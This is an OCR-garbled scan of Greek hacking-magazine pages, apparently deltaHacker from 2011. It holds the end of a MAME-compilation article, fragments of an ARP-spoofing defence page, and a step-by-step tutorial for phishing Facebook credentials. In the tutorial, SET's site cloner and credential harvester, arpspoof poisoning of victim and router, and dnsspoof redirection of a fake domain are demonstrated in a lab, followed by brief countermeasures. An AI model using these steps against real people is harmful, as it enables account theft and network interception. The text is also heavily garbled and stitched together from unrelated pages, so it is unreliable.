Ωστόσο, στην τοποθεσία www.retroroms.net διατίθενται εκατοντάδες 
ενημερωμένα ROM, τα οποία λειτουργούν ἄριστα µε την πιο πρὀσφατη 
ἐκδοση του MAME. Αν λοιπὀν µεταγλωττίσετε το ӧіко σας MAME και oTa- 
ματήσουν να naiZouv ορισμένα ano τα παιχνίδια σας, περάστε µια βόλτα 
ano την εν λόγω τοποθεσία, δημιουργήστε ἑναν δωρεὰν λογαριασμὀ κι 
απολαύστε... ;-) 


Τελική αναμέτρηση 


Μετὰ ano περίπου Eva μισάωρο η μεταγλώττιση εἶχε τελειώσει. Στο på- 
κελο µε τον ппүаіо κὠδικα εἰχε εμφανιστεὶ va εκτελέσιμο µε TO ὀνομα 
«mame.exe». Ἠταν το δικὀ µου MAME, χωρἰς το ενοχλητικὀ nag screen 
και HE Tn δυνατότητα αποθήκευσης των high scores. Αυτή τη фора ἡμουν 
πολύ κοντὰ στο να ολοκληρώσω -επιτέλους- τα μερεμέτια του arcade 
cabinet, ὥστε να συμπεριφέρεται ὁπως ακριβώς ἠθελα. Απέμεναν àiya 
μόνο βήματα. Καταρχάς, η μεταγλώττιση παρήγαγε Eva εκτελἑσιµο ap- 
χείο και τίποτα ἀλλο. Έπρεπε λοιπὸν να δημιουργήσω μόνος µου τη «δι- 
avoun» του MAME. Па το σκοπὀ auTO δηµιούργησα Eva νέο φάκελο κι 
αντέγραψα εκεὶ μέσα το νέο mame.exe. Па να δουλέψει ὁμως σωστά то 
patch που αφορά στην αποθήκευση των high scores, απαιτεἰται η παρου- 
oid ενὸς καταλὀγου µε το ὀνομα «hi» και ενὸς ειδικού αρχείου, στην ἰδια 
θέση µε το εκτελέσιμο του MAME. Αυτό το «ειδικό αρχείο» ἐχει то ὀνομα 
hiscore.dat και το κατέβασα απ΄ auth την τοποθεσία: 


www.mameworld.info/highscore/download.htm 


Το πακέτο zip που κατέβασα ano εκεἰ περιελάμβανε και πρόσθετα αρχεία, 
αλλά κράτησα μόνο αυτό που µε ενδιέφερε, το οποίο και ἐριξα στο φά- 
κελο µε TO καινούργιο mame.exe. Μέσα στον ἴδιο κατάλογο δηµιούργησα 
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κι ¿vav ακόµα µε то буора «hi». Στη συνέχεια ἐτρεξα το ста (TO τερµα- 
TIKO үранипс εντολἠς των Windows). Βλέπετε, σειρά εἶχε η δημιουργία 
του βασικού αρχείου ρυθμίσεων του MAME. AuTÒ το αρχείο δημιουργείται 
αυτόματα δίνοντας: 


mame -cc 


Н παράμετρος -cc προκύπτει апо τα apxikd των λέξεων create 
configuration. Πριν κλείσω το παράθυρο τερματικού εκτέλεσα κι αυτό: 


геп mame.exe mameui32.exe 


AuTñ η Kivnon αποτέλεσε ἐμπνευση της στιγµἠς! Та batch file nou εἶχα 
φτιάξει για To frontend ξεκινούσαν τα παιχνίδια καλώντας TO Mameui32. 
Επομένως, cite θα έπρεπε να δημιουργήσω òda τα batch file апо την apxn 
εἶτε ν΄ αλλάξω ὀνομα στο εκτελἑσιµο του MAME. Προτίµησα το δεύτερο. 


Σε GUTO το στάδιο, το δικὀ µου MAME ἦταν πλήρως λειτουργικὀ. Ωστόσο 
για να ἐρθει στα μέτρα του arcade cabinet έπρεπε να кауш δύο ακόμα 
ρυθμίσεις. Συγκεκριµένα, έπρεπε να ενεργοποιήσω την υποστήριξη πολ- 
Лаплоу πληκτρολογἰων και να ρυθµίσω την προεπιλεγμένη αναλογία για 
την προβολή των παιχνιδιών σε 4:3. H οθὀνη Tou arcade cabinet ἐχει 
αυτὲς ακριβώς τις αναλογἱες (εἶναι «τετράγωνη») και για να την εκµεταλ- 
λεύομαι στο ἐπακρο ἐπρεπε να ορἰσω τις ἴδιες αναλογίες και στα nalxvi- 
δια. Βέβαια αυτές οι ρυθμίσεις, εφόσον το MAME που "χα µεταγλωττίσει 
*dev* διέθετε GUI, έπρεπε να γίνουν χειροκίνητα. Έτσι, ἀνοιξα το αρχείο 
mame.ini κι αναζήτησα αρχικἁ την παράμετρο multikeyboard. Н τιµή που 
της έδωσα ἦταν η μονάδα και στη συνέχεια αναζήτησα την παράμετρο 
aspectO. Εκεἰ ἐδωσα την τιµή 4:3, αποθἠκευσα το αρχείο και το ἐκλεισα... 


Μετὰ ano τα παραπάνω, η δικἠ µου διανοµή MAME ἦταν ολοκληρωμένη, 
πλήρως λειτουργικἡ κι ἑτοιμη να αντιγραφεὶ στο PC του arcade cabinet! 


Αυτὸ ἦταν. Τον Φλεβάρη που θα επιστρέψει το φιλαράκι µου ano το Πὀρ- 
το Γερμενό, θα βγάλουμε γούστα! Μέχρι τότε, ὁμως, πρέπει να κάνω pE- 
ρικἀ high scores nou δεν θα ξεπεράσει ποτὲ ;-) 


Αντίμετρα για ro ARP pois 


© 4 | © deltahacker.gr/2011/09/30/arp-poisoning-alert/ 


πὲ 


з ame and OS TYPE 
ΝΜΝ 


т рев олд 
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arte 0S 


Πλήρη άρθρα που συμπληρώνουν το περιοδικό. 
Ολόκληρα άρθρα από το χθες. 


video casts [έρχονται, έρχονται]. 
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мв HOSTING χε е 4 


Ans3cure 


περιοδικό κοινότητα, Jvar/log/messages /dev/random addenda bftp canned streams 


Πίνακας ελέγχου 


Αντίµετρα ү‹а то ARP poisoning! 7 


Posted by subZraw | 30/09/2011, 00:15 | Published in addenda | 


Αρχείο δημοσιεύσεων. 


deltaHacker 001 βλέπουμε πώς ὑλοποιείται μια επίθεση Γενικό προφίλ 
Man in The Middle (ΜΙΤΜ) µέσα ос’ ένα τοπικό δίκτυο, µε 
βάση την αδυναμία του πρωτοκόλλου ARP για 
authentication. Στο ίδιο τεύχος κάνουμε και µια αναλυτική 
επίδειξη δύο τέτοιων επιθέσεων, η μία στόχο την αλλοίωση 
του DNS και η άλλη την υποκλοπή συνομιλιών instant 
messaging. 


Στα άρθρα που [ош από τις σελίδες 12 και 74 του 


Προφίλ στο forum 


Αποσύνδεση 


Αναζήτηση 


Νομίζουμε ότι ἦλθε η ώρα να δούμε και τα μέτρα προστασίας που μπορούμε να πάρουμε 
προκειµένου ν' αποφεύγουμε επιθέσεις που βασίζονται στην τεχνική του ARP poisoning ἡ 
αλλιώς ARP spoofing. H αλήθεια είναι ότι η άμυνα a! αυτές τις περιπτώσεις δεν είναι και 
τόσο εύκολη υπόθεση, κυρίως γιατί από τη φύση του το πρωτόκολλο ARP είναι ευάλωτ 
στις επιθέσεις του εἴδους. Αν και υπάρχουν διάφορες τεχνικές/μέθοδοι προστασίας, 
πλέον αποτελεσματικές άμυνες είναι δύο: η διαρκής (αυτοματοποιημένη) παρακολούθ 
του λεγόμενου ARP table για τον εντοπισμό αλλαγών στις buu 

συστηµάτων, καθώς και п χρήση στατικών καταχωρήσεω 

πράματα από την αρχή 


Μέθοδοι προστασίας από τη δηλητηρίαση 
Ανάλογα µε το αν εἴμαστε διαχειριστές τ 
διαφορετικές μεθόδους προστασίας. ( 
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Τα εβδομαδιαία µας 


Τα βίντεο από ta live streams. Τα πάντα ενδιαφέροντα forums. Το 
σηµείο συνάντησης για τους φίλους του περιοδικού. H πιο ζωντανή 


κοινότητα και οι πιο ανησ 


deltahacker.gr 


Joe the hacker was here 


xol, δημιουργικοί χρήστες ! 


taHacker 002 
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Skill: Beginner 
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Tags: Social 
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Παγκόσμιος ιστός Εικι 


В Bivteo 
- Έγγραφα 
£= Εικόνες 
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Αναζήτηση Google Αισθάνομαι τυχερός 


Υπάρχουν éva σωρὀ τρόποι για va 
δώσετε τα στοιχεῖα των λογαριασμών 
σας σε τρίτους, μάλιστα χωρίς καν va 

το πάρετε εἴδηση. Πριν орос δείτε στην 
πράξη пос pnopei να την πάθει κάποιος, 
g, λογικὀ εἶναι να ‘XETE τις αμφιβολίἰες 
σας - και τελικἀ να την πάθετε! 


`a 
V HA@KER 
Νο 


ΩΩ 


ооо BackTrack 
SA Applications Places System =) Sun Oct 30, 12:06 PM 8, 


Æ ΓῚ root@bt: /pentest/expl 


Τον τελευταίο καιρὀ οι ανανεώσεις για TO SET πέφτουν βροχή. Πριν λοιπόν τρέξουμε 
το πρόγραμμα, ας το αναβαθµίσουµε. 


Αν βἐβαια την πάθετε, μετά θα εἶστε поло πιο υποψιασμένοι κι εν τέλει 
προσεκτικοί. Ωστόσο To θέµα εἶναι να *рпу* την πάθετε για να μάθετε. 
П’ αυτὸ εἱμαστε εµεἰς εδὠ: Σ’ αυτὸ το άρθρο θα δείξουμε, αναλυτικἁ και 
βήμα προς βήμα, πὠς μπορεἰ ¿vag επιτιθέμενος να υποκλέψει τα OTOI- 
χεία του λογαριασμού που διατηρεἰ στο Facebook To υποψήφιο θύμα του. 
Πέρα ano ορισμένα απαραίτητα εργαλεἰα που θα παρουσιάσουμε σε λίγο, 
για να πετύχει το σκοπὀ του ο επιτιθέμενος εφαρμόζει και τεχνικὲς KOI- 
νωνικἠς µηχανικἠς (social engineering). Αυτὸ εξάλλου γἱνεται και στα 
nAdioia του ἄρθρου που ξεκινά апо τη σελἰδα 62 του deltaHacker nou 
κρατάτε στα χἐρια σας. Μόνο που αυτή τη фора το θύμα δεν χρειάζεται 
καν να πειστεἰ να κατεβάσει кат! στον υπολογιστή του, προκειµένου ο 
επιτιθέμενος να πετύχει το σκοπὸ του. Αλλά ας βάλουμε τα πράγματα σε 
uia σειρά. 
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Προσοχή: Ψάρεμα σε εξέλιξη! 
⁄/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////7/ 


өөө BackTrack 
` Applications Places =) Sun Oct 30, 12:10 PM &, 


х root@bt: /pentest/exploits/set 


from the menu 


Toolkit 


τη M root@bt: /pentest/expl... 


Τη στιγµή που γραφόταν το napov, η πλέον πρόσφατη ἐκδοση του SET ήταν n 2.2 
(κωδική ονομασία ‘Son of Flynn’). 


Το σκηνικὀ της επίθεσης 


Στα nAdioia της επἰδειξής µας, attacker και victim βρίσκονται ото ἰδιο 
LAN. Πιο συγκεκριµένα, δουλεύουμε μέσα σ’ Eva εικονικὀ περιβάλλον 
ὁπου ο επιτιθέμενος τρέχει BackTrack 5 R1. Το δε λειτουργικὀ σύστημα 
στον υπολογιστή του θύματος δεν ἐχει каріа απολύτως σημασία. Ακρι- 
βώς γι’ αυτό, του διαλέξαμε εμεὶς то openSUSE 11.4. Εἰχαμε και καιρὸ να 
ξεκινήσουμε το σχετικὀ VM (virtual machine), οπότε καταλαβαίνετε ότι η 
ευκαιρία αυτἠ δεν θα μπορούσε να προσπεραστε!. 


Γενικά, πολλὲς ano τις επιδείξεις µας τις κάνουμε σε εικονικἁ περιβάλ- 
λοντα. Το στήσιμο ενὸς virtual lab αποτελεἰ συνήθη πρακτικἠ για ὁσους 
ασχολούνται µε το penetration testing ειδικότερα και To hacking γενι- 
κότερα, εἶτε για να δοκιμάσουν, να πειραματιστούν και να μάθουν єїтє 
για να δείξουν σε ἄλλους τι ἐχουν μάθει/ανακαλύψει. Αν δεν έχετε HON 
στἠσει το δικὸ σας virtual lab, σας προτείνουμε να το κάνετε TO συντομὸ- 
τερο δυνατὸν. Σε σχετικὀ μάλιστα άρθρο που φιλοξενούμε στον δικτυακὀ 
τόπο του περιοδικού, δείχνουμε пос μπορείτε να φτιάξετε Eva EIKOVIKO 
εργαστήριο γύρω and το δωρεὰν VirtualBox (Διατίθεται για όλα τα γνω- 
ота λειτουργικά συστήματα — μέχρι και σε FreeBSD παϊζει!) To σχετικὀ 
URL εἰναι το ακὀλουθο: 


http://deltahacker.gr/?p=2667 
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https://login.facebook.com/login.php 
tle bit... 


To SET έχει την ικανότητα να φτιάχνει κλώνους ιστοσελίδων και να τους σερβίρει απὀ τον δικὀ TOU, EV- 

σωματωμένο web server. Αν κάποια an’ αυτές τις σελίδες συμπεριλαμβάνει φόρμα για login, στον κλὠνο 
υπάρχει φυσικά κι αυτή. Στο συγκεκριµένο παράδειγµα κλωνοποιείται η σελίδα login Tou Facebook. Στό- 
Хос του attacker εἶναι, φυσικἁ, Ta login credentials του ἄτυχου θύματος που θα επιχειρήσει να συνδεθεί 


στο «Facebook». 
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Н επίθεση 


Ξεκινάμε то BackTrack µας KI αφού φορτώσει κάνουμε login στο λογαρια- 
σμὸ του root. Σηκώνουμε то περιβάλλον γραφικών р’ Eva 


root@bt :~# 


Πα τη συνέχεια θα δουλεύουμε μέσα апо Eva ωραιότατο παράθυρο τερ- 
ματικού. Όπως εἰπαμε Ліүо πριν, στόχος µας εἶναι τα στοιχεία του λογα- 
ριασμού που διατηρεί στο Facebook το θύμα µας. Па να т’ αποκτήσου- 
µε θα καταφύγουμε στις υπηρεσίες του εργαλείου SET (Social-Engineer 
Toolkit, www.secmaniac.com), το οποίο εἶναι йӧп εγκατεστημένο στο 
BackTrack. Πηγαίνουμε λοιπὸν στον κατάλογο μέσα στον οποίο βρίσκεται 


root@bt :~# 


και πριν κάνουμε τίποτε GAAO φροντίζουμε να To αναβαθµίσουμε στην 
τελευταία του ἐκδοση: 


root@bt:/pentest/exploits/set# 


Meta апо λίγο To SET θα ἐχει αναβαθμιστεἰ κι εμείς το ξεκινάμε δίνοντας, 
апла 


root@bt:/pentest/exploits/set# 


Προσοχή: Ψάρεμα σε εξέλιξη! 
Z///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


200 == OpenSUSE 


openSUSE News - Mozilla Firefox 


‘openSUSE News 


ФВ rev: opensuse.org 


Support Community Development 
f Home > 2011 > 10 > 24 > openSUSE 12.1 PC1 spotted in the wild 


Subscribe 
openSUSE 12.1 RC1 spotted in the wild 


October 24th, 2011 by Јов Poortvliet 
этен 35 | ез 


As was already blogged by Vincent Untz, а few мее! our last milestone was 
released as beta 1, the first Release Candidate of op Е 12.1 Is now floating over the 
web! 


What’s new 3 Facebook 


SE is expected to bring a large number of improvements and Categories 
changes the ‘usual updates any Linux distribution offers. These include the latest Firefox 

GNOME 3,2 and KDE's Plasma Workspace 4.7. Under the hood, we have Linux кете! 3.1 and we expect to be the 

Ast to ship Google's new programming language Go, We also overhauled our boot procedure Introducing systemd Announcemen 
and Grub2 ( and of course we'll ship the latest developer tools and libraries as well as all the sysadmin [ 
goodies openSUSE Is known for! 


Build Service 


But we also have some really unique treats 
епс Conference 


Derivatives 
Testing Distribution 


The changes In underlying boot technology, the new tools like Snapper as well as the rest of the operating system Education Education 


need a good workout for the release! So now we need YOUR help! Go to the download page and grab your copy of Event Calendar 
openSUSE 12.1 RC1 and test it on your desktop, in a VM or on a laptop! 


You can find Information on testing on th Е Testing wiki page which also includes a link to the most Events 
annoying 12.1 bugs. Help us shorten that list by re-testing the problematic areas or by fixing the bugs; or help us Infrastructure 
{ind new pressing Issues! 

Marketing "=e! 
Get openSUSE 12.1 RCI from this раде зап: 


More information and other helping-out People of 
openSUSE 

The openSUSE 12.1 Portal page has been set up but still needs quite some work. There eenshots to be 

taken, release notes to be written and Documentation to be composed. We also welcome help with translation! Project 


S zeel 
= Тадэ tags available Sneak Peeks 


< Category: Announcements -Distribution Software 


tor фа Ίο ο ο m] @14°C Sun oct 30, 12:26 


Τη στιγµή που o attacker προετοιμάζει προσεκτικἁ και λεπτομερώς την επἰθεσἠ του, το υποψήφιο θύμα 
διαβάζει αμἐριμνο για τα χαρακτηριστικά που θα ἐχει η νέα ἐκδοση της αγαπημένης του διανομής Linux... 


Μέσα ano το σύστημα μενού του προγράμματος, ακολουθούμε την εξἠς 
διαδρομή: 


1. Social-Engineering Attacks --> 

2. Website Attack Vectors --> 

3. Credential Harvester Attack Method --> 
4. Site Cloner 


To SET ἐχει την ικανότητα να φτιάχνει κλώνους ιστοσελίδων και να τους 
σερβἰρει ano τον δικὀ του, ενσωματωμένο web server. Αν κάποια an’ 
αυτές τις σελίδες συμπεριλαμβάνει φόρμα για login, στον κλὠνο υπάρχει 
φυσικὰ κι αυτή. Тора, σε περίπτωση που κἀποιος, µε κάποιον τρόπο, ENI- 
σκεφτεἰ апо τον web browser Tou τη σελἰδα-κλώνο του SET και δώσει Ta 
στοιχεία του για να κάνει login, τότε το SET θα Ta καταγράψει αμέσως κι 
έπειτα θα στείλει τον ἰδιο «κἄποιο» στην αληθινἠ σελἰδα, όπου εκεἰ θα δει 
ἑνα μήνυμα για λανθασμένη απόπειρα login. Το πιθανότερο εἶναι oT! θα 
υποθέσει πως ¿kave κἁποιο λάθος πληκτρολόγησης, ETO! θα προσπαθήσει 
ξανὰ κι αυτή τη фора θα Ta καταφέρει, οπὀτε όλα кала. Όλα καλὰ και για 
τον επιτιθἑµενο, ο οποίος θα δει το SET va του παρουσιάζει τα στοιχεία 
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[ө оо BackTrack 
Ν Applications Places system [>] 52 Sun Oct 30, 12:41 РМ Š, 


х root@bt: /pentest/exploits/set 
File Edit minal Tabs Help 


root@bt: /pentest/exploits/set # | root@bt: /pentest/exploits/set 


arp 
arp 
arp 
arp 


...KI ενώ χαίρεται που επιτέλους θα μπορέσει να δοκιμάσει το BTRFS µέσα апо το υπέροχο openSUSE, 
χωρίς καν να το πάρει εἴδηση ὁλη η δικτυακή κυκλοφορία μεταξύ του μηχανήματός του και του router 
αρχίζει να διέρχεται ano To box του attacker! 


σύνδεσης του θύματος στο site, η σελἰδα login του οποίου κλωνοποιήθη- 
κε (εν προκειμένω TOU Facebook!) 


Στην npotponn «Enter the url to clone» του SET πληκτρολογούμε το 
«https://www.facebook.com» (χωρὶς Ta εισαγωγικἀ) και πατάμε To [Enter]. 
Αμέσως To SET αρχίζει να KAWvonolei τη πρώτη σελἰδα του αληθινού 
Facebook: Πρόκειται για τη σελἰδα ὀπου κάνουμε login. Όταν τελειώσει 
μας πληροφορεί για τις περιπτώσεις ката τις οποίες η «σύλληψη» των 
στοιχείων σύνδεσης εἶναι περισσότερο διασφαλισµένη. Πατάμε άλλη µια 
φορὰ To [Enter] κι ανοίγουμε εἰτε Eva VEO παράθυρο τερματικού εἰτε µια 
νέα καρτέλα στο ἡδη ανοικτὀ. 


Па τη συνέχεια θα αναδρομµολογἠσουμµε OAo το traffic μεταξύ υπολογι- 
στἠ-στόχου και router Tou LAN, ὥστε να περνά µέσα апо το BackTrack 
μας. Ουσιαστικά, θα εξαπολύσουμµε µια επίθεση Man іп The Middle (MiTM) 
μέσω της τεχνικής του ARP poisoning. Περισσότερες πληροφορίες για 
τη λογική πίσω ano τις επιθέσεις ΜΙΤΜ καθὼς και λεπτομέρειες για TO 
πὼς εξαπολύονται, μπορείτε να διαβάσετε στα δύο σχετικἀ ἀρθρα του 
deltaHacker 001 (βλ. σελ. 12 και 74). 


Ξεκινάμε δίνοντας στο BackTrack box δυνατότητες router: 


root@bt :~# 
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Προσοχή: Ψάρεμα σε εξέλιξη! 
ο” 


ooo Opens 


eth - Wireshark (as superuser) 


Protocol 
1104 137. 155837 АВР 192,168.176,5 15 at 00:50:56:37:27:5е 
1056 53.848944 192.168.170.130 is at 00:0с:29:81:77:а8 
1055 53.848935 Who has 192.168.170.130? Tell 192.168.170.132 
1054 53, 848932 192.168.170.5 is at 00:0с:29:86:72:1 
1053 53.848911 Who has 192.168.170.5? Tell 192. 
1052 53. 140503 37:27: Vmware_81:77:a8 192.168.170.5 is at 00:50:56:37: 
1044 51.139470  Vmware_37:27:Se Vmware 81177148. 192.168.170.5 is at 00:50:56:37:27:5е 
1036 49.138330 Vmware_37:27:5e Vmware_81:77:a8 192.168.170.5 is at 00:50:56:37:27:5e 
975 47.137711 š: 192.168.170.S is at 00: Β 
974 45.136790. 192.168.170.5 is at 
1057 55.141978 192.168.170.5 is at 
1058 57. 142697 192.168.170.5 is at 
1069 75.159030 
1067 73.158870 
1066 71.157490 
1065 69.156356 
1064 67.148637 
1063 65.147295 
1062 63.146133 3 
1061 61.144898 Vmware_37:27:5e 


192.168.170.5 is at 00: 
192.168.170.5 is at 
192.168.170.5 is at 
192.168.170.5 is at 
192.168.170.5 is at 


η 


| Y Ethernet II, Src: Vmware_37:27:5e (00:50:56:37:27:5е), Dst: Vmware_81:77:a8 (00:0с:29:81:77:а8) 
P Destination: Vmware 81:77:48 (00:09: 
> source: Vmware_37:27:5e (00:50:56:37:27:5е) 
Type: ARP (0x0806) 
Trailer: 000000000000000000000000000000000000 
V Address Resolution Protocol (reply) 
Hardware type: Ethernet (0x0001) 
Protocol type: ІР (0x0800) 
Hardware 
Protocol size: 4 
Opcode: reply (0x0002) 
[Is gratuitous: False] 
Sender MAC address: Vmware_37:27:52 (00:50:56:37:27:5е) 
Sender IP address: 192.168.170.5 (192.168, 170.5) 
Target MAC address: Vmeare_81:77:a8 (00:0с:29:81:77:а8) 
Target IP address: 192.168.170.130 (192.168.170.130) 


s: 1104 Displayed: 1104 Marked: 0 Dropped: 25 
Е @14°C Sun Oct 30, 12:57 


Αμέσως μετά δηλητηριάζουµε την ARP cache του στὀχου αλλά και του 
router: 


root@bt:~# arpspoof -t 192.168.170.130 192.168.170.5 


(Onou 192.168.170.5 εἶναι η διεύθυνση IP Tou router και 192.168.170.130 
η διεύθυνση ІР του oTóxou). AUTO ἠταν. Πλέον, ὁλο To traffic μεταξὺ στὀ- 
xou και (αληθινού) router περνάει µέσα ano To BackTrack box. 


Θέλουμε тора να πεἰσουµε TO θύμα να επισκεφτεἰ το δοκιµαστικὀ site 
του νέου Facebook, το οποίο ἐχει NOn ξεκινήσει δοκιµαστικἀ, αναγνωρἰ- 
ζει ὁλους τους λογαριασμούς χρηστών του «κλασικού» Facebook και η 
διεὐθυνσή του εἶναι 


http://next.facebook.com 


Βέβαια To site αυτὀ δεν υπάρχει. Κάπου εδὠ ὁμως εἶναι που ο καλὸς 
KOIVWVIKOG μηχανικὀς επινοεἰ Eva ἐξυπνο τέχνασμα, προκειµένου να nei- 
σει το υποψήφιο θύμα να πληκτρολογήσει στη рпара διευθύνσεων του 
web browser τη διεύθυνση http://next.facebook.com -- και να πατήσει 
το [Enter]. Αλλά για µια στιγµή. Πριν το πεἰσει πρέπει να φροντίσει WOTE 
η фаутастікй αυτή διεύθυνση ὀντως να πηγαἰνει kånou! Κι αυτό το «κά- 
που», φυσικὰ, εἶναι η διεύθυνση του web server nou τρέχει TO SET, oep- 


`a 
V HA@GKER 
ος 


УУУУ 


laoo BackTrack 
Ν Applications Places = =] Sun Oct 30, 1:02 PM δ, 


х root@bt: /pentest/exploits/set 


% root@bt: /pentest/exploits/set Ж | root@bt: /pentest/exploits/set 


Link encap 
inet addr:1 


0 frame:0 
s:0 carrier:0 


cap ο 
addr :1 0.1 M 55.0.0.0 
ope:Host 
MTU:16 


2 KB) 


ebook.com" > -/naughtydns 


Δεν φτάνει nou o attacker διαχειρίζεται πλέον To network traffic Tou vic (ἐτσι λένε στο CSI Ta victims, 
έτσι θα τα λέμε κι εμείς), θέλει τώρα να εκτελεί και χρέη DNS! 


βίροντας τη σελἰδα-κλὠνο του αληθινού Facebook. H διεύθυνση αυτή 
εἶναι η ἴδια р’ auth που ἐχει το BackTrack box. 


Στην περἰπτωσὴή µας ἦταν η 192.168.170.132. Ανοίξαμε λοιπὸν ἀλλη 
µια καρτέλα στο тєрратіко µας και προχωρήσαμε στο απαραίτητο DNS 
spoofing: 

root@bt :~# 

root@bt :~# 


dnsspoof: listening on eth@ [udp dst port 53 and not src 
192.168.170.132] 


To Tı сорВаім στο victim ре To που επισκέπτεται το http://next.facebook. 
com, Φαίνεται στα αντίστοιχα screenshots. Σε ἄλλα screenshots βλέπου- 
µε τη θέα nou ἐχει ο attacker. Απολαύστε ;) 


Αντίµετρα 


Πριν апо οποιοδήποτε τεχνικὀ μέσο, το прото και κύριο μέτρο проота- 
σίας εἶναι η ορθἠ κρἰση. Ποιος εἶναι αυτός που ξαφνικά µας μιλά για 
το «επόμενο Facebook»; Τον γνωρίζουμε προσωπικά; Εἶναι φερέγγυος; 
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Προσοχή: Ψάρεμα σε εξέλιξη! 
OLLI ih hah hh 


Facebook helps you connect and share with the people in your life. 


Facebook Login 


PEED a m; 


оо your password: 


ser Ej) ΤΟΡΘΠΗΤΕΡΕΕΡΟΘΕΓΜΑ. 


Το θύμα πείθεται να δει τι στο Καλό εἶναι αυτὀ TO Next Facebook, τέλος πάντων. Πάντως η πρώτη σελίδα 
δεν διαπνέεται κι апо κανέναν φοβερό αἐρα ανανέωσης. Αλλά αυτό μάλλον οφείλεται στο γεγονός От! 

το Next Facebook εἶναι ακόµη σε φάση beta. «О γουἑλ», σκέφτεται то Вік στα αγγλικά, «Al ué! aÇ γουέἑλ 
λογκ-ιν εντ фат ἆουτ γουατ δις μπρούὐχαχα IÇ OA αμπάουτ». Δίνει στον εαυτό του συγχαρητήρια για τον 
ἁπταιστο χειρισμὀ της αγγλικής -- και κάνει login. 


Μπορούμε va τον εμπιστευτούμε; Αλήθεια, ἐχουμε ακούσει ἄλλους να 
συζητούν γι’ αυτὸ το νέο Facebook; Καλύπτεται ως εἴδηση στην τεχνο- 
λογικἡ ειδησεογραφία; 


Μετὰ εἶναι και κάποιοι γρήγοροι, τεχνικοὶ ἐλεγχοι που μπορούμε να Kå- 
νουμε. Πα παράδειγµα, µε Eva ping στο next.facebook.com εἶναι εύκολο 
να καταλάβουμε αν η διεύθυνση ІР πίσω апо To буора ανήκει στο τοπικὀ 
δίκτυο ἡ ὀχι. Προσοχή: Ακόμη κι αν δεν ανήκει, δεν σηµαίνει ότι σώνει 
και кала το URL εἶναι ασφαλές. Μπορεί, π.χ., ο επιτιθέμενος να χει OTN- 
σει ἐναν malicious web server στο Internet και να ψαρεύει αθώα/αφελἠ 
θύματα. 


Τέλος, υπάρχουν και προγράμματα που µας προστατεύουν ano επιθέσεις 
της µορφἠς ΜΙΤΜ. Διαβάστε το σχετικὀ άρθρο που έχουμε online, στο 


http://deltahacker.gr/2011/09/30/arp-poisoning-alert 


Μην παραλείψετε και τα ιδιαιτέρως διαφωτιστικἁ σχόλια, στα οποία µετα- 
EU ἄλλων γίνονται και ενδιαφέρουσες προτάσεις προγραμμάτων προστα- 
σίας nou δεν αναφέρονται στο κυρίως άρθρο. 
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NNS 


Log In | Facebook - Mozilla Firefox 


Log In | Facebook 


facebook.com/logi 


ΕΙ facebook.com | hit 


ΠΕ 


facebook 


Facebook helps you connect and share with the people in your life. 


Facebook Login 


Login as: 
Йй Christos Varelas 


Not Christos! 


Password: 


ΠΟΠ ας 


Forgot your password? 


Engish (US) Ελληνικά Español Portugués (Brasi) Prangais (France) Deutsch ο στ 


Mobile Find Friends Badges People Pages About  Advertaing -Create a Page Developers «Careers Privacy - Terms Help 


Μάλλον ὁμως πρέπει va σταµατή- 
σει να σκέφτεται στα αγγλικά και 
τέλος πάντων να πληκτρολογεί πιο 
προσεκτικά. Στη δεύτερη προσπά- 
θεια θα καταφέρει να συνδεθεί 
επιτυχώς. Μόνο που θα δυσκολευ- 
Tél να εντοπίσει τις ὁποιες αλλαγές 
φέρνει αυτό το νέο Next Facebook. 
Παράξενο. Μάλλον πρὀκειται περί 
μούφας. «Πέπ, бат uaoT μπι IT», 
καταλήγει. 
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Προσοχή: Ψάρεμα σε εξέλιξη! 
ΓΚκΜ κ κ κ κ κ κἐἠκ!ἠκἠκἐἩἐἩ6ἐΜἐκκἁ«6ὥ6͵σ66αὋαοαοαᾶἒΨφΨ“Β“άᾳΨὔΨΜΨΜαΜΜ ih ih shhh 


өөө BackTrack 
Ν Applications Places System P 


A x root@bt: /pentest/exploits/set 
File Edit View Terminal Tabs Help 


root@bt: /pentest/exploits/set % root@bt: /pentest/exploits/set % root@bt: /pentest/exploits/set 


[-] to harvest credentials or parameters from a website as well as place them into a report 
-] SET supports both HTTP and HTTPS 

Ξ ple: http://ww.thisisafakesite.com 

ttack> Enter the url to clone:https://ww. facebook.com 


ΙΓ] I have read the above message. [*] 


Ίργοςς {return} to continue. 

[*] Social-Engineer Toolkit Credential Harvester Attack 

[*] Credential Harvester is running on port 80 

ΙΓ] Information will be displayed to you as it arrives below: 
192.168.170.130 - - [30/0с1/2011 13:16:19] "GET / HTTP/1.1" 200 - 


TE) root@bt: /pentest/expl... 


Το θύμα απογοητεύτηκε λίγο που δεν βρήκε кайт! καινούργιο с' αυτό το 
Next Facebook, ο επιτιθέμενος όμως εἰναι πολύ ευχαριστημένος. Βλέπετε, 
ΕΙ πλέον To email Kal To password Tou vic στο «κλασικό» Facebook ;) 


Στο τελευταίο 


VHAĞKER 


...TOU 2011 :) 


2 ολοκληρώστε To arduino-based game σας 


2 μάθετε пос να γράφετε κὠδικα NOU αντέχει 
τα SQL injections 


2 TIVGETE στον αέρα Eva Linux box 


„каї διαβάστε πολλά алла, εξαιρετικἁ 
ενδιαφέροντα θέματα που θα τινάξουν τις 
κάλτσες σας εκτὀς! (τι καλέ; µια χαρά δοκιμη 
ἐκφραση δεν εἶναι;) 


EIMA! O AAKHE “EIMAI TO PC TOY. 
AYTO EINAI TO PC MOY. ΝΑ R| ΑΥΤΟΣ EIWAI HAIOIO=" 


TEAIKA EIMAL 
хакер 
#' KPAKEP,.... 


78-9-2011 WWWLAKISGR.COM 


H διαφήμισή σας θα 
μπορούσε να εἶναι εδώ. 


Θα μπορούσε να 'ναι και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν εἶναι. 


Προς το παρόν. 


Πάντως µην αναρωτιέστε: Ξέρουμε ότι ξέρετε πως 
ξε ρου με ότι ξέρετε τι πρέπει να Κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2us@deltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (*) 
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